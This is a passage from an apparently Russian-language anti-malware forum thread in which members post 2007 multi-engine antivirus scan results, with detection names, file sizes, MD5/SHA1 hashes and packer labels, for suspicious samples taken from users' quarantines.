Sophos	4.21.0	2007.09.23	-
Sunbelt	2.2.907.0	2007.09.22	-
Symantec	10	2007.09.23	-
TheHacker	6.2.5.066	2007.09.22	-
VBA32	3.12.2.4	2007.09.23	-
VirusBuster	4.3.26:9	2007.09.22	-
*Webwasher-Gateway	6.0.1	2007.09.21	Trojan.Crypt.XPACK.Gen*

Дополнительная информация
File size: 36973 bytes
MD5: e48255ab09d9d93858f986f510b8749f
SHA1: 6d641317ab25891b005e899856662adbc73664cd

*Added 4 hours 2 minutes later*

Файл bac.exe получен 2007.09.23 17:35:21 (CET)
Текущий статус:   закончено 
Результат: 8/32 (25%) 


Антивирус	Версия	Обновление	Результат

AhnLab-V3	2007.9.22.0	2007.09.21	-
*AntiVir	7.6.0.15	2007.09.21	DR/Delphi.Gen*
Authentium	4.93.8	2007.09.23	-
*Avast	4.7.1043.0	2007.09.22	Win32dPinch-AQU*
AVG	7.5.0.485	2007.09.23	-
BitDefender	7.2	2007.09.23	-
CAT-QuickHeal	9.00	2007.09.21	-
ClamAV	0.91.2	2007.09.23	-
*DrWeb	4.33	2007.09.23	Trojan.MulDrop.8524
eSafe	7.0.15.0	2007.09.19	Suspicious Trojan/Worm*
eTrust-Vet	31.2.5154	2007.09.21	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.23	-
Fortinet	3.11.0.0	2007.09.23	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.21	-
*Ikarus	T3.1.1.12	2007.09.23	Virus.Win32.LdPinch.AQU*
Kaspersky	4.0.2.24	2007.09.23	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.23	-
NOD32v2	2545	2007.09.23	-
Norman	5.80.02	2007.09.21	-
*Panda	9.0.0.4	2007.09.23	Adware/Adsmart*
Prevx1	V2	2007.09.23	-
Rising	19.41.62.00	2007.09.23	-
Sophos	4.21.0	2007.09.23	-
Sunbelt	2.2.907.0	2007.09.22	-
*Symantec	10	2007.09.23	Backdoor.Trojan*
TheHacker	6.2.5.066	2007.09.22	-
VBA32	3.12.2.4	2007.09.23	-
VirusBuster	4.3.26:9	2007.09.23	-
*Webwasher-Gateway	6.0.1	2007.09.21	Trojan.Delphi.Gen*

Дополнительная информация
File size: 56832 bytes
MD5: 072ed79719d1e926f46dc05a3d3ed9f7
SHA1: ab31972f5804f52fb96b50d1865c35fe2aea035c

----------


## V_Bond

nusrmgr.exe from the thread ...
http://virusinfo.info/showthread.php...382#post137382
AhnLab-V3	2007.9.22.0	2007.09.21	-
*AntiVir	7.6.0.15	2007.09.24	TR/Crypt.FKM.Gen*
Authentium	4.93.8	2007.09.23	-
Avast	4.7.1043.0	2007.09.24	-
AVG	7.5.0.485	2007.09.24	-
BitDefender	7.2	2007.09.24	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.24	-
DrWeb	4.33	2007.09.24	-
*eSafe	7.0.15.0	2007.09.23	Win32.Trojan*
eTrust-Vet	31.2.5159	2007.09.24	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.24	-
Fortinet	3.11.0.0	2007.09.24	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.24	-
Ikarus	T3.1.1.12	2007.09.24	-
Kaspersky	4.0.2.24	2007.09.24	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.24	-
NOD32v2	2546	2007.09.24	-
Norman	5.80.02	2007.09.24	-
Panda	9.0.0.4	2007.09.24	-
*Prevx1	V2	2007.09.24	Trojan.SystemPoser*
Rising	19.42.02.00	2007.09.24	-
Sophos	4.21.0	2007.09.24	-
Sunbelt	2.2.907.0	2007.09.24	-
*Symantec	10	2007.09.24	Trojan Horse*
TheHacker	6.2.5.067	2007.09.24	-
*VBA32	3.12.2.4	2007.09.23	suspected of Trojan-Downloader.Agent.105*
VirusBuster	4.3.26:9	2007.09.23	-
*Webwasher-Gateway	6.0.1	2007.09.24	Trojan.Crypt.FKM.Gen*
Дополнительная информация
File size: 134151 bytes
MD5: 222c3ce6ffdc4e3932ec329b2fdbcfdd
SHA1: 21199c81106b77c2c6de457d29634508f73f7dd3
packers: UPX
packers: UPX
packers: UPX

----------


## drongo

```
Файл avz00001.dta получен 2007.09.25 13:37:29 (CET)
Антивирус    Версия    Обновление    Результат
AhnLab-V3    2007.9.22.0    2007.09.24    -
AntiVir    7.6.0.15    2007.09.25    -
Authentium    4.93.8    2007.09.25    -
Avast    4.7.1043.0    2007.09.24    -
AVG    7.5.0.485    2007.09.25    BHO.BDQ
BitDefender    7.2    2007.09.25    -
CAT-QuickHeal    9.00    2007.09.24    -
ClamAV    0.91.2    2007.09.25    -
DrWeb    4.33    2007.09.25    Trojan.Click.4444
eSafe    7.0.15.0    2007.09.23    Suspicious Trojan/Worm
eTrust-Vet    31.2.5162    2007.09.25    -
Ewido    4.0    2007.09.24    -
FileAdvisor    1    2007.09.25    -
Fortinet    3.11.0.0    2007.09.25    -
F-Prot    4.3.2.48    2007.09.25    -
F-Secure    6.70.13030.0    2007.09.25    Trojan-Clicker.Win32.Delf.in
Ikarus    T3.1.1.12    2007.09.25    -
Kaspersky    4.0.2.24    2007.09.25    Trojan-Clicker.Win32.Delf.in
McAfee    5126    2007.09.24    -
Microsoft    1.2803    2007.09.25    -
NOD32v2    2549    2007.09.25    -
Norman    5.80.02    2007.09.24    W32/BHO.QG
Panda    9.0.0.4    2007.09.25    Suspicious file
Prevx1    V2    2007.09.25    -
Rising    19.42.11.00    2007.09.25    -
Sophos    4.21.0    2007.09.25    -
Sunbelt    2.2.907.0    2007.09.25    -
Symantec    10    2007.09.25    -
TheHacker    6.2.5.068    2007.09.25    -
VBA32    3.12.2.4    2007.09.25    -
VirusBuster    4.3.26:9    2007.09.24    -
Webwasher-Gateway    6.0.1    2007.09.25    Win32.Malware.gen (suspicious)
Дополнительная информация
File size: 83968 bytes
MD5: 057b2bdfbd4cf0a8903ab2dfd785bd47
SHA1: e5623a42157bbbe8dc72ec1083e3369ace07090a
packers: MORPHINE, UPX
packers: Morphine
```



```
Файл avz00002.dta получен 2007.09.25 13:46:17 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.25	-
Authentium	4.93.8	2007.09.25	-
Avast	4.7.1043.0	2007.09.24	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.25	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.25	-
DrWeb	4.33	2007.09.25	Trojan.NtRootKit.394
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5162	2007.09.25	-
Ewido	4.0	2007.09.24	-
FileAdvisor	1	2007.09.25	-
Fortinet	3.11.0.0	2007.09.25	-
F-Prot	4.3.2.48	2007.09.25	-
F-Secure	6.70.13030.0	2007.09.25	Rootkit.Win32.Agent.iy
Ikarus	T3.1.1.12	2007.09.25	Rootkit.Win32.Agent.iy
Kaspersky	4.0.2.24	2007.09.25	Rootkit.Win32.Agent.iy
McAfee	5126	2007.09.24	-
Microsoft	1.2803	2007.09.25	-
NOD32v2	2549	2007.09.25	-
Norman	5.80.02	2007.09.24	-
Panda	9.0.0.4	2007.09.25	-
Prevx1	V2	2007.09.25	-
Rising	19.42.11.00	2007.09.25	-
Sophos	4.21.0	2007.09.25	-
Sunbelt	2.2.907.0	2007.09.25	-
Symantec	10	2007.09.25	-
TheHacker	6.2.5.068	2007.09.25	-
VBA32	3.12.2.4	2007.09.25	-
VirusBuster	4.3.26:9	2007.09.24	-
Webwasher-Gateway	6.0.1	2007.09.25	-
Дополнительная информация
File size: 17408 bytes
MD5: a7f6558fd1b821da244688dd515eebcb
SHA1: 57ac06799991ab0f0df2a509e37bd4a86c074dbc
```

----------



## HATTIFNATTOR

Антивирус Версия Обновление Результат 
AhnLab-V3 2007.9.22.0 2007.09.24 - 
AntiVir 7.6.0.15 2007.09.26 - 
Authentium 4.93.8 2007.09.25 - 
Avast 4.7.1043.0 2007.09.26 - 
AVG 7.5.0.485 2007.09.25 - 
BitDefender 7.2 2007.09.26 - 
CAT-QuickHeal 9.00 2007.09.24 - 
ClamAV 0.91.2 2007.09.26 *Trojan.Downloader.JS.Zapchast.B* 
DrWeb 4.33 2007.09.26 - 
eSafe 7.0.15.0 2007.09.23 - 
eTrust-Vet 31.2.5164 2007.09.25 - 
Ewido 4.0 2007.09.25 - 
FileAdvisor 1 2007.09.26 - 
Fortinet 3.11.0.0 2007.09.26 - 
F-Prot 4.3.2.48 2007.09.25 - 
F-Secure 6.70.13030.0 2007.09.26 *Trojan-Downloader.JS.Zapchast.b* 
Ikarus T3.1.1.12 2007.09.26 - 
Kaspersky 4.0.2.24 2007.09.26 *Trojan-Downloader.JS.Zapchast.b* 
McAfee 5127 2007.09.25 - 
Microsoft 1.2803 2007.09.26 - 
NOD32v2 2551 2007.09.26 - 
Norman 5.80.02 2007.09.25 - 
Panda 9.0.0.4 2007.09.26 - 
Prevx1 V2 2007.09.26 - 
Rising 19.42.22.00 2007.09.26 - 
Sophos 4.21.0 2007.09.26 - 
Sunbelt 2.2.907.0 2007.09.26 - 
Symantec 10 2007.09.26 - 
TheHacker 6.2.6.070 2007.09.26 - 
VBA32 3.12.2.4 2007.09.26 - 
VirusBuster 4.3.26:9 2007.09.25 - 
Webwasher-Gateway 6.0.1 2007.09.26 - 
Дополнительная информация 
File size: 1226 bytes 
MD5: f2f238f97f9e3939917827671f4f3a35 
SHA1: f95f70d6c86931aed8b93ced7e61bc38641e802f 




Антивирус Версия Обновление Результат 
AhnLab-V3 2007.9.22.0 2007.09.24 - 
AntiVir 7.6.0.15 2007.09.26 - 
Authentium 4.93.8 2007.09.25 - 
Avast 4.7.1043.0 2007.09.26 - 
AVG 7.5.0.485 2007.09.25 *JS/Psyme* 
BitDefender 7.2 2007.09.26 *Trojan.Js.Downloader.BDS* 
CAT-QuickHeal 9.00 2007.09.24 - 
ClamAV 0.91.2 2007.09.26 *JS.XorCrypt* 
DrWeb 4.33 2007.09.26 *VBS.Psyme.434* 
eSafe 7.0.15.0 2007.09.23 *JS.MS06-006* 
eTrust-Vet 31.2.5164 2007.09.25 - 
Ewido 4.0 2007.09.25 - 
FileAdvisor 1 2007.09.26 - 
Fortinet 3.11.0.0 2007.09.26 - 
F-Prot 4.3.2.48 2007.09.25 - 
F-Secure 6.70.13030.0 2007.09.26 - 
Ikarus T3.1.1.12 2007.09.26 *Trojan-Downloader.JS.Agent.kd* 
Kaspersky 4.0.2.24 2007.09.26 - 
McAfee 5127 2007.09.25 *JS/Downloader-BCZ* 
Microsoft 1.2803 2007.09.26 - 
NOD32v2 2551 2007.09.26 - 
Norman 5.80.02 2007.09.25 - 
Panda 9.0.0.4 2007.09.26 - 
Prevx1 V2 2007.09.26 - 
Rising 19.42.22.00 2007.09.26 - 
Sophos 4.21.0 2007.09.26 *Troj/JSXor-Gen* 
Sunbelt 2.2.907.0 2007.09.26 - 
Symantec 10 2007.09.26 *Downloader* 
TheHacker 6.2.6.070 2007.09.26 - 
VBA32 3.12.2.4 2007.09.26 - 
VirusBuster 4.3.26:9 2007.09.25 - 
Webwasher-Gateway 6.0.1 2007.09.26 - 
Дополнительная информация 
File size: 28711 bytes 
MD5: 7883e4e8cf6466445a989ebc33429faa 
SHA1: bf2581c276c378f2ec18711f800ad8874f6fbe88

----------


## TANUKI

> Файл moonlander.exe получен 2007.09.22 09:55:12 (CET)


Thanks for the link via PM ;) I reported this site to Yandex tech support; they thanked me for the cooperation and promptly shut down this kiddie's site ;)

----------


## drongo

```
Файл avz00005.dta получен 2007.09.26 14:04:45 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.26	W32/Backdoor.BVAA
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5165	2007.09.26	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	-
F-Prot	4.3.2.48	2007.09.26	W32/Backdoor.BVAA
F-Secure	6.70.13030.0	2007.09.26	-
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2551	2007.09.26	-
Norman	5.80.02	2007.09.26	-
Panda	9.0.0.4	2007.09.26	-
Prevx1	V2	2007.09.26	-
Rising	19.42.22.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	-
Symantec	10	2007.09.26	-
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.25	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	-
Дополнительная информация
File size: 69632 bytes
MD5: 29657d950b9c71203edcbdeaa0b8d03b
SHA1: 83b08cec7ab50ab1a018ca21654ec63d90c8553b
```

----------


## vaber

```
Файл d.exe получен 2007.09.26 14:41:22 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.26	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	suspicious Trojan/Worm
eTrust-Vet	31.2.5165	2007.09.26	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	-
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.26	-
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2551	2007.09.26	-
Norman	5.80.02	2007.09.26	-
Panda	9.0.0.4	2007.09.26	Suspicious file
Prevx1	V2	2007.09.26	Heuristic: Suspicious Browser Help Object
Rising	19.42.22.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	-
Symantec	10	2007.09.26	-
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	Win32.ModifiedUPX.gen!90 (suspicious)
Дополнительная информация
File size: 31744 bytes
MD5: a96b11dbbe695689530b17381e77fa26
SHA1: 298f3cd6d37b3820bfed48cab0eca5ce9b63d7bf
```



```
Файл inst209.exe получен 2007.09.23 19:25:38 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.21	-
AntiVir	7.6.0.15	2007.09.21	HEUR/Crypted
Authentium	4.93.8	2007.09.23	-
Avast	4.7.1043.0	2007.09.22	-
AVG	7.5.0.485	2007.09.23	-
BitDefender	7.2	2007.09.23	-
CAT-QuickHeal	9.00	2007.09.21	-
ClamAV	0.91.2	2007.09.23	-
DrWeb	4.33	2007.09.23	-
eSafe	7.0.15.0	2007.09.23	suspicious Trojan/Worm
eTrust-Vet	31.2.5154	2007.09.21	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.23	-
Fortinet	3.11.0.0	2007.09.23	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.21	-
Ikarus	T3.1.1.12	2007.09.23	-
Kaspersky	4.0.2.24	2007.09.23	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.23	-
NOD32v2	2545	2007.09.23	-
Norman	5.80.02	2007.09.21	-
Panda	9.0.0.4	2007.09.23	-
Prevx1	V2	2007.09.23	-
Rising	19.41.62.00	2007.09.23	-
Sophos	4.21.0	2007.09.23	-
Sunbelt	2.2.907.0	2007.09.22	-
Symantec	10	2007.09.23	-
TheHacker	6.2.5.066	2007.09.22	-
VBA32	3.12.2.4	2007.09.23	-
VirusBuster	4.3.26:9	2007.09.23	-
Webwasher-Gateway	6.0.1	2007.09.21	Heuristic.Crypted
Дополнительная информация
File size: 115200 bytes
MD5: 957a754dfda54cca450dfff63edbbb25
SHA1: f06d43609f6dc917ed20cfc41a27f86d2ee68ef9
packers: UPX
packers: UPX
```



```
Файл installer.exe получен 2007.09.26 09:27:57 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.25	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	Suspicious Trojan/Worm
eTrust-Vet	31.2.5164	2007.09.25	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	-
F-Prot	4.3.2.48	2007.09.25	-
F-Secure	6.70.13030.0	2007.09.26	W32/BHO.QG
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2550	2007.09.25	-
Norman	5.80.02	2007.09.25	W32/BHO.QG
Panda	9.0.0.4	2007.09.26	-
Prevx1	V2	2007.09.26	-
Rising	19.42.21.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	-
Symantec	10	2007.09.26	-
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	Win32.Malware.gen!88 (suspicious)
Дополнительная информация
File size: 164864 bytes
MD5: 40a736cc1e53fcc426da16b590d56609
SHA1: e69f6cae46ead2e3d5158becf14fff54af2fef48
packers: MORPHINE
packers: Morphine
```



```
Файл ldr.exe получен 2007.09.26 14:41:41 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.26	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	Suspicious Trojan/Worm
eTrust-Vet	31.2.5165	2007.09.26	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	W32/Agent.BRW!tr
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.26	Bancos.gen3
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2551	2007.09.26	-
Norman	5.80.02	2007.09.26	Bancos.gen3
Panda	9.0.0.4	2007.09.26	Suspicious file
Prevx1	V2	2007.09.26	-
Rising	19.42.22.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	VIPRE.Suspicious
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	-
Дополнительная информация
File size: 42496 bytes
MD5: d9dcd8ef5377bfdf69f66a045737f57f
SHA1: 9c1736a14cf2976f7d86389c465689f70e09497c
```



```
Файл xueta.exe получен 2007.09.19 10:25:55 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.19.0	2007.09.19	-
AntiVir	7.6.0.10	2007.09.19	-
Authentium	4.93.8	2007.09.18	-
Avast	4.7.1043.0	2007.09.18	-
AVG	7.5.0.485	2007.09.18	-
BitDefender	7.2	2007.09.19	-
CAT-QuickHeal	9.00	2007.09.18	-
ClamAV	0.91.2	2007.09.19	-
DrWeb	4.33	2007.09.19	-
eSafe	7.0.15.0	2007.09.17	-
eTrust-Vet	31.2.5147	2007.09.19	-
Ewido	4.0	2007.09.18	-
FileAdvisor	1	2007.09.19	-
Fortinet	3.11.0.0	2007.09.19	-
F-Prot	4.3.2.48	2007.09.18	-
F-Secure	6.70.13030.0	2007.09.19	-
Ikarus	T3.1.1.12	2007.09.19	Virus.Win32.LdPinch.AQU
Kaspersky	4.0.2.24	2007.09.19	-
McAfee	5122	2007.09.18	-
Microsoft	1.2803	2007.09.19	-
NOD32v2	2540	2007.09.19	-
Norman	5.80.02	2007.09.18	-
Panda	9.0.0.4	2007.09.19	Suspicious file
Prevx1	V2	2007.09.19	-
Rising	19.41.20.00	2007.09.19	-
Sophos	4.21.0	2007.09.19	-
Sunbelt	2.2.907.0	2007.09.15	-
Symantec	10	2007.09.19	-
TheHacker	6.2.5.062	2007.09.19	-
VBA32	3.12.2.4	2007.09.19	-
VirusBuster	4.3.26:9	2007.09.18	-
Webwasher-Gateway	6.0.1	2007.09.19	-
Дополнительная информация
File size: 26624 bytes
MD5: b7d0500b4009a2c0b8522e8ed3a8f3d3
SHA1: 408947feb60eb59ea3fddbc74765664c1e5184e9
```

This is a mass detection :)

----------


## PavelA

Guys! Let's stick to the rules. Highlight detections in *bold*.

*Added 4 hours 59 minutes later*

From thread 12636 (latest quarantine)
File *mchInjDrv.sys* is a driver from Comodo firewall

Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.27.0	2007.09.27	-
AntiVir	7.6.0.15	2007.09.27	-
Authentium	4.93.8	2007.09.27	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.488	2007.09.26	-
BitDefender	7.2	2007.09.27	-
CAT-QuickHeal	9.00	2007.09.26	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5168	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
Fortinet	3.11.0.0	2007.09.27	-
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.27	-
Ikarus	T3.1.1.12	2007.09.27	-
Kaspersky	7.0.0.125	2007.09.27	-
McAfee	5128	2007.09.26	-
Microsoft	1.2803	2007.09.27	-
NOD32v2	2554	2007.09.26	-
Norman	5.80.02	2007.09.27	-
Panda	9.0.0.4	2007.09.27	-
Prevx1	V2	2007.09.27	-
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
*Sunbelt	2.2.907.0	2007.09.26	MiniKey Log*
Symantec	10	2007.09.27	-
*TheHacker	6.2.6.072	2007.09.27	Trojan/Agent.go*
*VBA32	3.12.2.4	2007.09.26	Rootkit.Win32.Agent.go*
VirusBuster	4.3.26:9	2007.09.26	-
Webwasher-Gateway	6.0.1	2007.09.27	-

Дополнительная информация
File size: 2560 bytes
MD5: 9971aa2d16cb558358d6f6f3b5055cba
SHA1: 288c6072be03ee6bc957126f14bb9bde0d199081
Sunbelt info: MiniKey Log enables logging of activities on your PC unnoticed

----------


## drongo

```
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.28.0	2007.09.27	-
AntiVir	7.6.0.15	2007.09.27	-
Authentium	4.93.8	2007.09.27	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.488	2007.09.27	-
BitDefender	7.2	2007.09.27	GenPack:Adware.WebBuying.N
CAT-QuickHeal	9.00	2007.09.27	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5168	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
Fortinet	3.11.0.0	2007.09.27	-
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.27	-
Ikarus	T3.1.1.12	2007.09.27	-
Kaspersky	7.0.0.125	2007.09.27	-
McAfee	5128	2007.09.26	-
Microsoft	1.2803	2007.09.27	-
NOD32v2	2554	2007.09.26	-
Norman	5.80.02	2007.09.27	-
Panda	9.0.0.4	2007.09.27	Suspicious file
Prevx1	V2	2007.09.27	-
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
Sunbelt	2.2.907.0	2007.09.26	Web Buying
Symantec	10	2007.09.27	Adware.Webbuy
TheHacker	6.2.6.072	2007.09.27	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.27	-
Webwasher-Gateway	6.0.1	2007.09.27	Virus.Win32.FileInfector.gen!94 (suspicious)
Дополнительная информация
File size: 171520 bytes
MD5: a5d4209c9c0712171d2a5da4a429c4bc
SHA1: 2887cdd4999e2782b61dee11d71e09d74c29d3e1
```

----------


## TANUKI

Файл avz00002.dta получен 2007.09.27 20:19:17 (CET)

Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.9.28.0	2007.09.27	-
*AntiVir	7.6.0.15	2007.09.27	TR/Rootkit.Gen*
Authentium	4.93.8	2007.09.27	-
*Avast	4.7.1043.0	2007.09.26	Win32:Agent-KYE
AVG	7.5.0.488	2007.09.27	BackDoor.Generic8.IYA*
BitDefender	7.2	2007.09.27	-
CAT-QuickHeal	9.00	2007.09.27	-
*ClamAV	0.91.2	2007.09.27	Trojan.Downloader-13660*
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
Fortinet	3.11.0.0	2007.09.27	-
F-Prot	4.3.2.48	2007.09.27	-
*F-Secure	6.70.13030.0	2007.09.27	Trojan-Downloader.Win32.Agent.dfc*
*Ikarus	T3.1.1.12	2007.09.27	Trojan-Downloader.Win32.Agent.bbb*
*Kaspersky	7.0.0.125	2007.09.27	Trojan-Downloader.Win32.Agent.dfc
McAfee	5129	2007.09.27	BackDoor-CVM!sys*
Microsoft	1.2803	2007.09.27	-
*NOD32v2	2554	2007.09.26	probably a variant of Win32/TrojanDownloader.Agent.NPO
Norman	5.80.02	2007.09.27	Rootkit.gen4*
Panda	9.0.0.4	2007.09.27	-
Prevx1	V2	2007.09.27	-
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
Sunbelt	2.2.907.0	2007.09.26	-
*Symantec	10	2007.09.27	Trojan.Farfli*
TheHacker	6.2.6.072	2007.09.27	-
VBA32	3.12.2.4	2007.09.26	-
*VirusBuster	4.3.26:9	2007.09.27	Rootkit.QQHelp.Gen.5
Webwasher-Gateway	6.0.1	2007.09.27	Trojan.Rootkit.Gen*
Дополнительная информация
File size: 35136 bytes
MD5: 0efe1876eef858de0ff4a1b738de242b
SHA1: ce88e8978e9a27f5aeb0784adae98a5aa2b0664a

*Added 18 minutes later*

Файл avz00004.dta получен 2007.09.27 20:19:45 (CET)

Результат: 5/32 (15.63%)

Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.9.28.0	2007.09.27	-
AntiVir	7.6.0.15	2007.09.27	-
Authentium	4.93.8	2007.09.27	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.488	2007.09.27	-
BitDefender	7.2	2007.09.27	-
CAT-QuickHeal	9.00	2007.09.27	-
ClamAV	0.91.2	2007.09.27	-
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
*Fortinet	3.11.0.0	2007.09.27	W32/Qhost.OS!tr*
F-Prot	4.3.2.48	2007.09.27	-
*F-Secure	6.70.13030.0	2007.09.27	Trojan.Win32.Qhost.os*
Ikarus	T3.1.1.12	2007.09.27	-
*Kaspersky	7.0.0.125	2007.09.27	Trojan.Win32.Qhost.os*
McAfee	5129	2007.09.27	-
Microsoft	1.2803	2007.09.27	-
NOD32v2	2554	2007.09.26	-
Norman	5.80.02	2007.09.27	-
Panda	9.0.0.4	2007.09.27	-
*Prevx1	V2	2007.09.27	TROJAN.AGENT.GEN*
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
Sunbelt	2.2.907.0	2007.09.26	-
*Symantec	10	2007.09.27	Adware.Rugo*
TheHacker	6.2.6.072	2007.09.27	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.27	-
Webwasher-Gateway	6.0.1	2007.09.27	-
Дополнительная информация
File size: 118784 bytes
MD5: 8818f8257087de58761f802d74d6b4b4
SHA1: 64acb372bd127de20fa55683aa5ac466708329e3

----------


## mayas

Antivirus 	Version 	Last Update 	Result


```
AhnLab-V3	2007.9.29.0	2007.09.28	-
AntiVir	7.6.0.18	2007.09.28	HEUR/Crypted
Authentium	4.93.8	2007.09.29	Possibly a new variant of W32/Backdoor-based
